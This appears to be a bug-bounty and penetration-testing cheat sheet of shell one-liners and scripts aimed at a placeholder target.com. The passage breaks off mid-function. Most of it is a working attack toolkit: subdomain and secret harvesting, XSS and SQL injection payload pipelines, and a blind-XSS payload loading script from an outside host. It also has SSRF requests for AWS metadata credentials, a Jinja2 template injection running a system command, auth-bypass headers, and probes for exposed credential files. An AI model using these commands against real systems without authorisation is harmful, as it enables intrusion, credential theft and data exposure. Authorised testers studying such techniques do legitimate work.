curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt

ð Wayback Machine Subdomains

# â ï¸ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

ð CommonCrawl Extraction

# â ï¸ CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt

ð VirusTotal Subdomains

# â ï¸ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt

ð DNS Zone Transfer Attempt

# â ï¸ Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt

ð Reverse IP Lookup

# â ï¸ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

ð BGP/ASN Range Scanner

# â ï¸ Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

ð PTR Records from IP Range

# â ï¸ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt

ð All-in-One Mega Oneliner

# â ï¸ THE ULTIMATE SUBDOMAIN HUNTER â ï¸
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

ð Subdomain Permutation/Bruteforce

# â ï¸ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

ð DNS Wordlist Bruteforce with PureDNS

# â ï¸ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

ð TLS/SSL Certificate Grabber

# â ï¸ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

ð Favicon Hash -> Shodan

# â ï¸ Find related hosts via favicon hash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

ð Google Dork Subdomain Discovery

# â ï¸ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com

ð JavaScript Recon

Complete JS Pipeline

subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txt

Extract Secrets from JS

cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt

LinkFinder on JS Files

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

SecretFinder Mass Scan

cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

JS Variables Extraction

cat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -u

API Keys from JS

cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

Extract All URLs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^\"\'\`\s\<\>]+)" | sort -u | anew js_urls.txt

Find API Endpoints in JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u

Extract Hardcoded Credentials

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

Extract AWS Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

Extract Google API Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\-_]{35}" | sort -u | anew google_api_keys.txt

Extract Firebase URLs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt

Extract S3 Buckets from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+\.amazonaws\.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

Extract Internal IPs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt

Extract Slack Webhooks from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt

Extract GitHub Tokens from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt

Extract Private Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt

Extract Email Addresses from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt

Extract Hidden Subdomains from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sed 's|https\?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt

ð Extract GraphQL Endpoints from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt

ð Extract JWT Tokens from JS Files

cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt

ð Find Webpack Source Maps

cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt

ð Extract Discord Webhooks from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt

ð Find Hidden Admin Routes in JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt

ð XSS Detection

Dalfox Pipeline

cat urls.txt | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | dalfox pipe --silence --skip-bav

Blind XSS with Callback

cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent

Airixss Fast Scan

echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

Knoxss API

cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"

DOM XSS Detection

cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'

Mass XSS with Nuclei DAST

cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50

Reflected Parameter Detection

cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt

XSS Polyglot Testing

cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"

ðï¸ SQL Injection

SQLMap Mass Scan

cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2

Error-Based Detection

cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt

Time-Based Blind

cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt

Ghauri Scan

cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3

UNION Detection

cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200

Boolean-Based Detection

cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt

NoSQL Injection

cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt

ð SSRF & SSTI

SSRF with Interactsh

cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent

SSRF Parameter Fuzzing

cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"

SSTI Detection

cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt

SSTI Payload Test

cat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"

Full SSRF Chain

cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent

SSRF with DNS Rebinding

cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent

Jinja2 SSTI

cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent

ð·ï¸ Web Crawling

Katana Deep Crawl

katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt

Gospider Full Crawl

gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew

Hakrawler with Scope

echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt

ParamSpider Discovery

paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt

Waymore Historical URLs

waymore -i target.com -mode U -oU urls.txt

Crawl with Headless Browser

katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt

Extract Forms

katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt

ð Katana Multi-Target Deep Crawl + JS Parsing

# â ï¸ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt

ð Gospider Recursive + Sitemap + Robots

# â ï¸ Full crawl with sitemap parsing and robots.txt extraction
gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt

ð Hakrawler + Wayback + GAU Combined Crawler

# â ï¸ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt

ð Katana Headless + Form Autofill + Screenshot

# â ï¸ Headless browser crawl with form interaction and XHR capture
katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt

ð Cariddi Full Crawl with Secret Detection

# â ï¸ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt

ð Parallel Domain Crawler Pipeline

# â ï¸ Mass parallel crawling with deduplication
cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt

ð Katana + Gospider + LinkFinder Chain

# â ï¸ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt

ð Recursive Crawl + Nuclei Auto-Scan Pipeline

# â ï¸ Crawl then auto-scan discovered endpoints for vulnerabilities
katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E "\.(php|asp|aspx|jsp|do|action)(\?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt

ð Waymore + Katana Historical + Live Merge

# â ï¸ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt

ð Multi-Crawler Output Dedup + Parameter Extraction

# â ï¸ Run all crawlers and extract unique parameters
(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt

ð Parameter Discovery

X8 Hidden Parameters

cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

Arjun Discovery

arjun -i urls.txt -oT arjun_params.txt --stable

Custom Param Bruteforce

cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac

Mine Parameters from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

Parameter Pollution Test

cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

ð Content Discovery

Ffuf Directory Bruteforce

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

ð Recursive Fuzzing - ffuf Deep Scan

# â ï¸ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json

ð Feroxbuster Full Recursive Scan

# â ï¸ Deep recursive scan with auto-tune and smart filtering
feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt

ð Feroxbuster Multi-Target Recursive

# â ï¸ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o ferox_@.txt

ð ffuf + Feroxbuster Pipeline (Extensions + Recursion)

# â ï¸ Find directories with ffuf, then deep scan each with feroxbuster
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q

ð Recursive Fuzzing with Extensions Mass Scan

# â ï¸ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json

ð Feroxbuster Parallel Recursive Scan

# â ï¸ Parallel scan with multiple wordlists and extensions
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt

ð Feroxbuster Silent Recursive + Headers

# â ï¸ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt

ð Feroxbuster Extract Links + Recursive

# â ï¸ Extract links from responses and add to scan queue recursively
feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt

ð Feroxbuster Resume + Filter by Size

# â ï¸ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt

ð Feroxbuster API Endpoints Discovery

# â ï¸ Recursive API fuzzing with JSON content-type
feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt

Git Exposure

cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

Sensitive Files

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

Backup Files

cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

API Documentation

cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

Source Code Leak

cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

Config Files

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

Database Files

cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

â¡ Nuclei Scanning

Full Template Scan

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

CVE Scanning

nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

Subdomain Takeover

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

Exposed Panels

nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

Misconfigurations

nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

DAST Mode

nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

Custom Tags

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

Network Scanning

nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

ð API Security Testing

GraphQL Introspection

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

REST API Enumeration

cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

JWT Analysis

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txt

API Key Leakage

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt

Broken Authentication

# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

Rate Limiting Test

for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

BOLA/IDOR Testing

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

ð API Endpoint Fuzzing with ffuf

# â ï¸ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json

ð API Version Fuzzing

# â ï¸ Discover hidden API versions
ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c

ð REST API Methods Fuzzing

# â ï¸ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt

ð GraphQL Fuzzing with ffuf

# â ï¸ Fuzz GraphQL endpoints for introspection and queries
ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json

ð API Parameter Fuzzing

# â ï¸ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json

ð API Authentication Bypass Fuzzing

# â ï¸ Test auth bypass techniques on protected endpoints
cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt

ð OpenAPI/Swagger Fuzzing

# â ï¸ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt

ð API JSON Fuzzing with Nuclei

# â ï¸ Mass API fuzzing with nuclei DAST mode
cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt

ð API Mass Assignment Fuzzing

# â ï¸ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt

ð API FUZZ with Custom Wordlist Generation

# â ï¸ Generate API wordlist from JS files and fuzz
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\']/(api|v[0-9])/[a-zA-Z0-9/_-]+[\"\']" | tr -d "\"'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json

âï¸ Cloud Security

AWS S3 Bucket Finder

cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

S3 Permission Check

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

Firebase Database

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

Azure Blob Storage

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt

GCP Storage

cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

AWS Metadata SSRF

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

Cloud Credential Files

cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

ð¤ Automation Scripts

Full Recon Pipeline

#!/bin/bash
domain=$1
mkdir -p $domain && cd $domain

# Subdomains
subfinder -d $domain -all -silent | anew subs.txt
amass enum -passive -d $domain | anew subs.txt
assetfinder -subs-only $domain | anew subs.txt

# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt

# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt

# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt

# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

XSS Hunter Script

#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x onerror=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

API Recon Script

#!/bin/bash
target=$1
mkdir -p $target/api && cd $target/api

# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

# Extract from JS
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+)" | sort -u | anew js_api_endpoints.txt

# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"

âï¸ Bash Functions

Add to your .bashrc or .zshrc:

# Quick recon
recon() {
    subfinder -d $1 -silent | anew subs.txt
    assetfinder -subs-only $1 | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon $1
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
